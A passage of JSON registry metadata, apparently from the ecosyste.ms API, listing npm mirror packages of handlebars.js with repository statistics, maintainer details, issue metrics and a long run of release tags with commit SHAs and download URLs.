itHub/repositories/handlebars-lang%2Fhandlebars.js/tags/1.0.rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/1.0.rc.1/manifests"},{"name":"v1.0.6-2","sha":"08e580a23be5abd74bdb757063bb783f4f240ea3","kind":"commit","published_at":"2012-07-31T16:50:55.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v1.0.6-2","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v1.0.6-2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.0.6-2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.0.6-2/manifests"},{"name":"v1.0.6","sha":"f5289a35ecdbd35898fa6d291600ac9427930b44","kind":"commit","published_at":"2012-07-23T20:40:07.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v1.0.6","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v1.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.0.6/manifests"},{"name":"v1.0.6beta","sha":"fe7d16de9196718bbe716d684f2a1c349f24284b","kind":"commit","published_at":"2012-07-23T15:36:13.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v1.0.6beta","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v1.0.6beta","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.0.6beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.0.6beta/manifests"},{"name":"v1.0.5beta","sha":"bef909f5cbf855f38f58c727d07dbe8330d4c370","kind":"commit","published_at":"2012-02-09T17:06:11.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v1.0.5beta","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v1.0.5beta","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.0.5beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.0.5beta/manifests"},{"name":"1.0.0.beta.1","sha":"81071dd22c5295d796ab702d910e167029e178c4","kind":"commit","published_at":"2011-05-04T03:39:24.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/1.0.0.beta.1","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/1.0.0.beta.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/1.0.0.beta.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/1.0.0.beta.1/manifests"},{"name":"0.9.0.pre.4","sha":"d7f93c09e7031b28b27296b1e8f8e8bc801e56c9","kind":"tag","published_at":"2011-02-15T21:44:08.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/0.9.0.pre.4","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/0.9.0.pre.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/0.9.0.pre.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/0.9.0.pre.4/manifests"}]},"repo_metadata_updated_at":"2024-08-26T07:51:10.714Z","dependent_packages_count":0,"downloads":142,"downloads_period":"last-month","dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":33.22465185260429,"dependent_packages_count":47.29143244528639,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":40.258042148945336},"purl":"pkg:npm/%40handlebarsjs/handlebars","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/npm/@handlebarsjs/handlebars","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/npm/@handlebarsjs/handlebars","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/npm/@handlebarsjs/handlebars/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2024-08-22T13:52:49.360Z","issues_count":140,"pull_requests_count":92,"avg_time_to_close_issue":23318098.785714287,"avg_time_to_close_pull_request":13631714.983333332,"issues_closed_count":98,"pull_requests_closed_count":60,"pull_request_authors_count":33,"issue_authors_count":109,"avg_comments_per_issue":3.4642857142857144,"avg_comments_per_pull_request":1.565217391304348,"merged_pull_requests_count":40,"bot_issues_count":0,"bot_pull_requests_count":0,"past_year_issues_count":27,"past_year_pull_requests_count":25,"past_year_avg_time_to_close_issue":146246.46153846153,"past_year_avg_time_to_close_pull_request":2700115.6666666665,"past_year_issues_closed_count":13,"past_year_pull_requests_closed_count":12,"past_year_pull_request_authors_count":9,"past_year_issue_authors_count":20,"past_year_avg_comments_per_issue":1.1851851851851851,"past_year_avg_comments_per_pull_request":1.2,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":0,"past_year_merged_pull_requests_count":9,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/issues","maintainers":[{"login":"jaylinski","count":34,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jaylinski"},{"login":"nknapp","count":21,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nknapp"}],"active_maintainers":[{"login":"jaylinski","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jaylinski"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@handlebarsjs%2Fhandlebars/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@handlebarsjs%2Fhandlebars/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@handlebarsjs%2Fhandlebars/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@handlebarsjs%2Fhandlebars/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@handlebarsjs%2Fhandlebars/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@handlebarsjs%2Fhandlebars/codemeta","maintainers":[{"uuid":"aniude","login":"aniude","name":null,"email":"aniude@qq.com","url":null,"packages_count":9,"html_url":"https://www.npmjs.com/~aniude","role":null,"created_at":"2024-01-31T06:15:21.912Z","updated_at":"2024-01-31T06:15:21.912Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/aniude/packages"}],"registry":{"name":"npmjs.org","url":"https://registry.npmjs.org","ecosystem":"npm","default":true,"packages_count":5678686,"maintainers_count":1211412,"namespaces_count":399623,"keywords_count":847874,"github":"npm","metadata":{"funded_packages_count":171745},"icon_url":"https://github.com/npm.png","created_at":"2022-04-04T15:19:23.081Z","updated_at":"2026-06-10T05:11:46.456Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/namespaces"}},{"id":7998942,"name":"handlebars-jaylinski","ecosystem":"npm","description":"Handlebars provides the power necessary to let you build semantic templates effectively with no frustration","homepage":"https://handlebarsjs.com/","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/handlebars-lang/handlebars.js","keywords_array":["handlebars","mustache","template","html"],"namespace":null,"versions_count":2,"first_release_published_at":"2023-07-27T22:07:52.724Z","latest_release_published_at":"2023-07-27T22:07:52.724Z","latest_release_number":"4.7.8","last_synced_at":"2026-07-19T22:22:29.137Z","created_at":"2023-07-27T23:33:40.622Z","updated_at":"2026-07-19T22:22:29.137Z","registry_url":"https://www.npmjs.com/package/handlebars-jaylinski","install_command":"npm install handlebars-jaylinski","documentation_url":null,"metadata":{"funding":null,"dist-tags":{"latest":"4.7.9-0"}},"repo_metadata":{"id":998342,"uuid":"809601","full_name":"handlebars-lang/handlebars.js","owner":"handlebars-lang","description":"Minimal templating on steroids.","archived":false,"fork":false,"pushed_at":"2024-09-03T20:27:37.000Z","size":4058,"stargazers_count":17948,"open_issues_count":93,"forks_count":2044,"subscribers_count":450,"default_branch":"master","last_synced_at":"2024-09-27T02:08:53.020Z","etag":null,"topics":["handlebars","mustache","templates"],"latest_commit_sha":null,"homepage":"http://handlebarsjs.com","language":"JavaScript","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":"linkedin/Burrow","license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/handlebars-lang.png","metadata":{"files":{"readme":"README.markdown","changelog":null,"contributing":"CONTRIBUTING.md","funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2010-07-31T18:54:46.000Z","updated_at":"2024-09-26T08:04:12.000Z","dependencies_parsed_at":"2023-09-22T06:08:40.588Z","dependency_job_id":"704e5df2-5b6b-4f79-8e30-c8540825a30e","html_url":"https://github.com/handlebars-lang/handlebars.js","commit_stats":{"total_commits":1718,"total_committers":206,"mean_commits":8.339805825242719,"dds":0.519208381839348,"last_synced_commit":"f422bfdf3ed321c32c6eecfaa778de46275fb76d"},"previous_names":["wycats/handlebars.js"],"tags_count":89,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/handlebars-lang","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":219874961,"owners_count":16554632,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"handlebars-lang","name":"The Handlebars Templating Language","uuid":"19378685","kind":"organization","description":"","email":null,"website":"https://handlebarsjs.com/","location":null,"twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/19378685?v=4","repositories_count":8,"last_synced_at":"2024-04-28T02:35:24.096Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/handlebars-lang","funding_links":[],"total_stars":17814,"followers":61,"following":0,"created_at":"2022-11-02T16:37:33.313Z","updated_at":"2024-04-28T02:35:25.495Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/handlebars-lang","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/handlebars-lang/repositories"},"tags":[{"name":"v4.7.8","sha":"8dc3d2517b41d12b1e06f88a449f30d27c137c21","kind":"tag","published_at":"2023-08-01T21:10:59.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.7.8","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.7.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.7.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.7.8/manifests"},{"name":"v4.7.7","sha":"a9a8e403213583ca90cb7c872d3a22796c37d961","kind":"tag","published_at":"2021-02-15T09:36:12.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.7.7","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.7.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.7.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.7.7/manifests"},{"name":"v4.7.6","sha":"e6ad93ea01bcde1f8ddaa4b4ebe572dd616abfaa","kind":"tag","published_at":"2020-04-03T17:56:25.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.7.6","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.7.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.7.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.7.6/manifests"},{"name":"v4.7.5","sha":"1fd2edee2a12fb228061fcde807905c6b14339c4","kind":"tag","published_at":"2020-04-02T19:09:52.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.7.5","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.7.5/manifests"},{"name":"v4.7.4","sha":"7adc19ab40917389fc1372d19677f1d024ec42b1","kind":"tag","published_at":"2020-04-01T17:20:34.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.7.4","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.7.4/manifests"},{"name":"v3.0.8","sha":"16bd606fec0ada4c811eb7afe6bfd619d88f3d37","kind":"tag","published_at":"2020-02-23T10:02:00.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v3.0.8","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v3.0.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v3.0.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v3.0.8/manifests"},{"name":"v4.7.3","sha":"c9789691af60b446f12f75dd9762f9d8fd3f36eb","kind":"tag","published_at":"2020-02-05T05:10:35.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.7.3","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.7.3/manifests"},{"name":"v4.7.2","sha":"586e672c8bba7db787bc9bfe9a9fde4ec98d5b4f","kind":"tag","published_at":"2020-01-13T20:53:16.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.7.2","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.7.2/manifests"},{"name":"v4.7.1","sha":"14ba3d0c43d75bcfcdbfb7c95c9fac99d88a17c8","kind":"tag","published_at":"2020-01-12T12:21:10.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.7.1","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.7.1/manifests"},{"name":"v4.7.0","sha":"0d5c807017f8ba6c6d947f9d6852033c8faa2e49","kind":"tag","published_at":"2020-01-10T16:24:09.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.7.0","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.7.0/manifests"},{"name":"v4.6.0","sha":"91a1b5d2f456cb733cbd88149fc9270973db79d7","kind":"tag","published_at":"2020-01-08T22:45:17.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.6.0","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.6.0/manifests"},{"name":"v4.5.3","sha":"c819c8b533934d2ac18001d7eb27a3205b00c2f3","kind":"tag","published_at":"2019-11-18T07:10:26.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.5.3","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.5.3/manifests"},{"name":"v4.5.2","sha":"8de121d21c88a6ab877e3a0eec9daaac483f3bf0","kind":"tag","published_at":"2019-11-13T21:07:27.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.5.2","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.5.2/manifests"},{"name":"v4.5.1","sha":"7ef86173abb446cf564ad6dc2646a4c361e2ab9f","kind":"tag","published_at":"2019-10-29T04:42:23.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.5.1","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.5.1/manifests"},{"name":"v4.5.0","sha":"b24797da01afd4e849fdb315dea8335792974522","kind":"tag","published_at":"2019-10-28T18:47:51.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.5.0","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.5.0/manifests"},{"name":"v4.4.5","sha":"8e1cce79186ab6caeb8c6ec9c1f8bcfa1a40e83d","kind":"tag","published_at":"2019-10-20T21:08:10.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.4.5","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.4.5/manifests"},{"name":"v4.4.4","sha":"2ab261eab7835e9c80ad1cb7ef9fc9b0f46d6a57","kind":"tag","published_at":"2019-10-20T19:33:00.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.4.4","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.4.4/manifests"},{"name":"v4.4.3","sha":"2e53fba68f8c51f9aca97615944fdbdeba94ff62","kind":"tag","published_at":"2019-10-08T20:05:35.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.4.3","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.4.3/manifests"},{"name":"v4.4.2","sha":"b793350fec0bb652c0bb2658089d7002af27a76b","kind":"tag","published_at":"2019-10-02T20:44:36.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.4.2","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.4.2/manifests"},{"name":"v4.2.2","sha":"0d5c691f36baae183349c51c47228da45278c50a","kind":"tag","published_at":"2019-10-02T20:12:55.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.2.2","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.2.2/manifests"},{"name":"v4.3.5","sha":"e96c1a5d86d8b2e8b152578fa37d5cdebc2964a3","kind":"tag","published_at":"2019-10-02T20:05:02.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.3.5","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.3.5/manifests"},{"name":"v4.4.1","sha":"b8e769fcb624664a6bc7114c8739c2438d46dbe9","kind":"tag","published_at":"2019-10-02T19:52:34.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.4.1","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.4.1/manifests"},{"name":"v4.4.0","sha":"059b33057925ebda96536421cfc7c4c75e5c61e3","kind":"tag","published_at":"2019-09-29T13:29:13.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.4.0","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.4.0/manifests"},{"name":"v4.3.4","sha":"c958cc89550ca411a78fefa426b0acee80c702eb","kind":"tag","published_at":"2019-09-28T11:25:05.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.3.4","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.3.4/manifests"},{"name":"v4.3.3","sha":"e4738491b3e8db97aa9b4f9967f04093ceba1a1f","kind":"tag","published_at":"2019-09-27T05:46:55.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.3.3","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.3.3/manifests"},{"name":"v4.3.2","sha":"2357140c68d17cb4f8ab74431e8737de6b4b39b5","kind":"tag","published_at":"2019-09-26T21:58:48.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.3.2","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.3.2/manifests"},{"name":"v4.3.1","sha":"050cca0866b3496852d9b198141807c32e4dae81","kind":"tag","published_at":"2019-09-24T22:32:32.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.3.1","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.3.1/manifests"},{"name":"v4.3.0","sha":"a89081d440a9da9f3f25835f47de837907b0094a","kind":"tag","published_at":"2019-09-24T06:04:35.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.3.0","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"t